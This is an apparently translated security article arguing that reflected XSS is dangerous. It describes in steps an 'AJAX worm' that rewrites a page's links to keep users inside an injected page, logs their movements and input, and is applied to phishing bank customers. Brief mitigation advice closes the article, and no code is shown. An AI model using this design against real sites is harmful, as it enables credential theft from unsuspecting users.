One Step from Passive XSS Vulnerability to AJAX Worm Implementation

    Many times I meet with the opinion that passive XSS vulnerability does not pose a great danger and it is not worth worrying about this. And despite the fact that this is partly true (if compared with other, more catastrophic errors), the possibility of embedding your code on a vulnerable site, even requiring significant additional actions to deceive the user, can lead to serious consequences, in particular, the possibility of completely intercepting further user actions.

    What is an AJAX Worm?


    AJAX worm - a javascript code that modifies the links on the page of its location in such a way as to remain in the context of the current page when the user clicks on these links, replacing the full navigation AJAX requests. In the simplest version, it is implemented in several lines, as follows.

    1. Obtaining all the links on the page
    2. Adding to them all their own handler
    3. Executing an AJAX request with the address of the clicked link
    4. Substituting the page content with the result obtained in step 3
    5. Infecting the links of the new content

    It is clear that this is a very simplified scenario, a full-fledged “combat” worm will monitor the correct change of the page title and the connection of css and js files in the header, and, if possible, use url spoofing in those browsers where possible. But the simplest option, putting the received data immediately into the body element, is fully functional. Implementation example.

    A small digression - if it were possible to get an arbitrary page code on the network from a browser, the security problem would be much more serious, fortunately all modern browsers do not allow cross-site requests. But this can be circumvented by sending requests to an intermediate application located on the same domain as the page with the worm and performing the function of downloading content.


    In the simplest case, this application is implemented in one line in php. The combat option, at a minimum, should be able to cache downloaded data in order to minimize the time it takes the client to receive data 2 times, but in the very ideal case, support the reception / transmission of cookies, and make requests through a set of proxies so as not to give out too often shining ip in the logs.

    Even in this simplest version, we get an infected page that allows us to "navigate" the network, actually remaining on one page and, if desired, logging the user's movements and the data entered by him. Of course, if the user notices that the address of the page magically remains the same or that the status bar constantly contains requests for an unfamiliar domain, he can immediately sound the alarm, but we are so smart and the average user may well ignore this fact.

    Although this method allows you to do a lot of dirty tricks, it requires too much action for the initial entrapment of a person into the pages of a trap. Not to mention the fact that such a page will very quickly find itself in all kinds of blacklisted browsers, but what if a trap page turns out to be someone else’s, completely safe at first glance, a page from a domain familiar to the user. This is where the opportunity to embed your code through XSS vulnerabilities on another site enters the fray.

    Imagine a smart attacker conducting a phishing attack on bank users. He does not need to create any fake sites, just indicate in the letter a link to the vulnerable page of the site and the user is sure that he will go to the trusted domain and will be in the infected zone. Moreover, it is not necessary that he sees in front of him, for example, a search on the site, a javascript allows you to arbitrarily modify the content, which means that the user can submit an index or any other page.

    Not only that, an attacker can completely avoid the use of an interlayer for obtaining data, because the requested data is within the same domain, and therefore can be obtained by direct AJAX request. Alternatively, an attacker could use the same vulnerable page to minimize the visibility of the infection, as in this case, real transitions between pages will occur, and the target link can be encoded, for example, as an anchor in the url.



    And what to do with all this.


    Prevent the presence of XSS vulnerabilities - manual and automatic testing, as well as the use of frameworks with the correct data shielding policy from the outside.

    From the moment the attacker injected his code into the site page, we have completely lost control, and any protective scripts can be cut out of the code, and the data entered by the user is transferred to a third-party server. The only half-measure can be a fixed login form page and checking the referrer and ip address of the login script sending, so that you can prevent the attacker from automatically getting into the system. Which, however, will not prevent him from using the stolen data himself.

    Also popular now: